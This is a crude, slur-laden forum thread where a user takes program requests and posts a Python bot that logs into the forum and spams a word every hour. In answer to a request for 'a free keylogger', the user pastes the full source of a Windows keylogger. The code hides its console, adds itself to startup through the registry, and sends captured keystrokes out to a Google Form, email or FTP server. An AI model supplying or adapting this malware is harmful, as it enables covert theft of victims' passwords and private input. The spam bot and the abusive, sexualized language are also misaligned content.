User Controls

For practice and fun, you may request a software you'd like to see developed and i will try to make it.

  1. #1
    Sophie Pedophile Tech Support
    I am feeling like programming, but i am a little out of inspiration. IF you want to have a program developed but you can't code i will try to make it for you. No guarantees though. You have the option of getting the program in Bash as a .sh, in Python as .py or binary form should you desire.

  2. #2
    mmQ Lisa Turtle
    Can you make one that automatically makes my account post 'tendies' in trt at the top of the hour, every hour?
  3. #3
    Sophie Pedophile Tech Support
    Originally posted by mmQ Can you make one that automatically makes my account post 'tendies' in trt at the top of the hour, every hour?

    I probably can. Let me try.
  4. #4
    Sophie Pedophile Tech Support

    import mechanize
    import time

    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.addheaders = [('user-agent', ' Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3'),
    ('accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]


    def login():
    username = raw_input("Please enter your username: ")
    password = raw_input("Please enter your password: ")

    print "[+]Logging in."

    try:
    br.open("http://niggasin.space")
    except Exception as e:
    print "\nCould not open target URL, please reference the error message below: "
    print
    print e


    br.form = list(br.forms())[0]
    br["username"] = username
    br["password"] = password

    # Submit values for username and password fields
    response = br.submit()

    print "\n[+]Response:"
    print
    print response

    post()


    def post():
    while True:
    br.open("http://niggasin.space/thread/206")

    br.form = list(br.forms())[21]
    br["content"] = "tendies"

    response = br.submit()

    print "\n[+]Response:"
    print
    print response
    print
    print "[+]One hour until your next post"

    time.sleep(3600)


    login()
    [/code]

    Done, see my "tendies" post in TRT? That was posted by this script for testing purposes.



    [i]Post last edited by Sophie at 2016-12-27T23:17:09.813891+00:00[/i]
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. #5
    Sophie Pedophile Tech Support
    Remove the semi colons, the code tags add them after the URLs.
  6. #6
    Can you make a program that follows my General Theory of Kek Activity?

    i.e. sorts post numbers by dubs trips etc and search for keywords and files related to Kek
  7. #7
    Sophie Pedophile Tech Support
    Originally posted by thelittlestnigger Can you make a program that follows my General Theory of Kek Activity?

    i.e. sorts post numbers by dubs trips etc and search for keywords and files related to Kek

    Blehrhg i'll have to make a scraper and do some regex mumbo jumbo for that. If you really really want it, it's possible but it will probably take me an hour orn two to research and to write.

    Any other requests?
  8. #8
    where do I get a free keylogger
  9. #9
    Sophie Pedophile Tech Support
    Originally posted by SCronaldo_J_Trump where do I get a free keylogger

    Here.


    '''
    Xenotix Python Keylogger for Windows
    ====================================
    Coded By: Ajin Abraham <ajin25@gmail.com>
    Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
    GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
    FEATURES
    ========
    1.STORE LOGS LOCALLY
    2.SEND LOGS TO GOOGLE FORMS
    3.SEND LOGS TO EMAIL
    4.SEND LOGS TO FTP
    MINIMUM REQUIREMENTS
    ===================
    Python 2.7: http://www.python.org/getit/
    pyHook Module: http://sourceforge.net/projects/pyhook/
    pyrhoncom Module: http://sourceforge.net/projects/pywin32/
    pyHook Module -
    Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
    NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
    '''
    try:
    import pythoncom, pyHook
    except:
    print "Please Install pythoncom and pyHook modules"
    exit(0)
    import os
    import sys
    import threading
    import urllib,urllib2
    import smtplib
    import ftplib
    import datetime,time
    import win32event, win32api, winerror
    from _winreg import *

    #Disallowing Multiple Instance
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    print "Multiple Instance not Allowed"
    exit(0)
    x=''
    data=''
    count=0

    #Hide Console
    def hide():
    import win32console,win32gui
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window,0)
    return True

    def msg():
    print """\n \nXenotix Python Keylogger for Windows
    Coder: Ajin Abraham <ajin25@gmail.com>
    OPENSECURITY.IN
    usage:xenotix_python_logger.py mode [optional:startup]
    mode:
    local: store the logs in a file [keylogs.txt]

    remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.

    email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).

    ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
    [optional] startup: This will add the keylogger to windows startup.\n\n"""
    return True

    # Add to startup
    def addStartup():
    fp=os.path.dirname(os.path.realpath(__file__))
    file_name=sys.argv[0].split("\\")[-1]
    new_file_path=fp+"\\"+file_name
    keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run'

    key2change= OpenKey(HKEY_CURRENT_USER,
    keyVal,0,KEY_ALL_ACCESS)

    SetValueEx(key2change, "Xenotix Keylogger",0,REG_SZ, new_file_path)

    #Local Keylogger
    def local():
    global data
    if len(data)>100:
    fp=open("keylogs.txt","a")
    fp.write(data)
    fp.close()
    data=''
    return True

    #Remote Google Form logs post
    def remote():
    global data
    if len(data)>100:
    url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
    klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
    try:
    dataenc=urllib.urlencode(klog)
    req=urllib2.Request(url,dataenc)
    response=urllib2.urlopen(req)
    data=''
    except Exception as e:
    print e
    return True

    #Email Logs
    class TimerClass(threading.Thread):
    def __init__(self):
    threading.Thread.__init__(self)
    self.event = threading.Event()
    def run(self):
    while not self.event.is_set():
    global data
    if len(data)>100:
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com" #Specify Server Here
    PORT = 587 #Specify Port Here
    USER="your_email@gmail.com"#Specify Username Here
    PASS="password_here"#Specify Password Here
    FROM = USER#From address is taken from username
    TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
    SUBJECT = "Keylogger data: "+str(ts)
    MESSAGE = data
    message = """\
    From: %s
    To: %s
    Subject: %s
    %s
    """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:
    server = smtplib.SMTP()
    server.connect(SERVER,PORT)
    server.starttls()
    server.login(USER,PASS)
    server.sendmail(FROM, TO, message)
    data=''
    server.quit()
    except Exception as e:
    print e
    self.event.wait(120)

    #Upload logs to FTP account
    def ftp():
    global data,count
    if len(data)>100:
    count+=1
    FILENAME="logs-"+str(count)+".txt"
    fp=open(FILENAME,"a")
    fp.write(data)
    fp.close()
    data=''
    try:
    SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
    USERNAME="ftp_username" #Specify your FTP Username
    PASSWORD="ftp_password" #Specify your FTP Password
    SSL=0 #Set 1 for SSL and 0 for normal connection
    OUTPUT_DIR="/" #Specify output directory here
    if SSL==0:
    ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
    elif SSL==1:
    ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
    ft.cwd(OUTPUT_DIR)
    fp=open(FILENAME,'rb')
    cmd= 'STOR' +' '+FILENAME
    ft.storbinary(cmd,fp)
    ft.quit()
    fp.close()
    os.remove(FILENAME)
    except Exception as e:
    print e
    return True

    def main():
    global x
    if len(sys.argv)==1:
    msg()
    exit(0)
    else:
    if len(sys.argv)>2:
    if sys.argv[2]=="startup":
    addStartup()
    else:
    msg()
    exit(0)
    if sys.argv[1]=="local":
    x=1
    hide()
    elif sys.argv[1]=="remote":
    x=2
    hide()
    elif sys.argv[1]=="email":
    hide()
    email=TimerClass()
    email.start()
    elif sys.argv[1]=="ftp":
    x=4
    hide()
    else:
    msg()
    exit(0)
    return True

    if __name__ == '__main__':
    main()

    def keypressed(event):
    global x,data
    if event.Ascii==13:
    keys='<ENTER>'
    elif event.Ascii==8:
    keys='<BACK SPACE>'
    elif event.Ascii==9:
    keys='<TAB>'
    else:
    keys=chr(event.Ascii)
    data=data+keys
    if x==1:
    local()
    elif x==2:
    remote()
    elif x==4:
    ftp()

    obj = pyHook.HookManager()
    obj.KeyDown = keypressed
    obj.HookKeyboard()
    pythoncom.PumpMessages()
  10. #10
    I need it to work with one of these.



  11. #11
    Sophie Pedophile Tech Support
    Originally posted by SCronaldo_J_Trump I need it to work with one of these.


    Good luck with that. Got a software request for me?
  12. #12
    Sophie Pedophile Tech Support
    Still taking requests, come on guys enjoy the fruits of my labor. Exploit me like the shy loli i am.
  13. #13
    Number13 African Astronaut [dispute my snotty-nosed seagull]
    A Bill Krozby post remover, it'll help everyone.
  14. #14
    shitpost bot 5000
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by the holy ghost shitpost bot 5000

    If you write me phrases it has to post in the format below i will do it.


    phrases = ["Phrase one", "Phrase two", "Phrase three"]

  16. #16
    Sophie Pedophile Tech Support
    Originally posted by Number13 A Bill Krozby post remover, it'll help everyone.

    There is this type of browser extension that lets you dynamically enhancement, edit and/or replace certain content. It's name escapes me at the moment, but you could set it to enhancement out all of Bill Krozby's posts.
  17. #17
    Originally posted by Sophie If you write me phrases it has to post in the format below i will do it.


    phrases = ["Phrase one", "Phrase two", "Phrase three"]

    its a shitpost generator
  18. #18
    Sophie Pedophile Tech Support
    Originally posted by the holy ghost its a shitpost generator

    Well, then make me a list of words it has to randomly mash together, because i can't teach a program how to talk without using some type of deep learning algorithms/networks/whatever.
  19. #19
    Originally posted by Sophie Well, then make me a list of words it has to randomly mash together, because i can't teach a program how to talk without using some type of deep learning algorithms/networks/whatever.

    are there any open source codes that can randomly mash together sentences in a lexically logical way? basically if sentences can be constructed in a way that makes sense grammatically but have verbs and adjectives replaced with our buzzwords like cuck or derpadew or THE jediS or syncans etc it would start resembling a really retarded poster and at least achieve bling bling level sentience without any deep learning algorithm required
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. #20
    Sophie Pedophile Tech Support
    Originally posted by the holy ghost are there any open source codes that can randomly mash together sentences in a lexically logical way?

    I am sure there are, that being said it would need to be in Python, or i would have to translate it to Python because i am a Python programmer.

    Originally posted by the holy ghost basically if sentences can be constructed in a way that makes sense grammatically but have verbs and adjectives replaced with our buzzwords like cuck or derpadew or THE jediS or syncans etc it would start resembling a really retarded poster and at least achieve bling bling level sentience without any deep learning algorithm required

    I agree, but the words and parts of sentences and buzzwords would still need to come from somewhere. It is impossible for me to randomly generate character for character and have it say something resembling coherence without the program knowing what a word is how a sentence works and where to insert a buzzword.

    It's good to to think of a computer like a literal retard, you have to tell it exactly what to do and how or it will not do it. A computer cannot intuit. Unless we emulate intuition with deep learning.
Jump to Top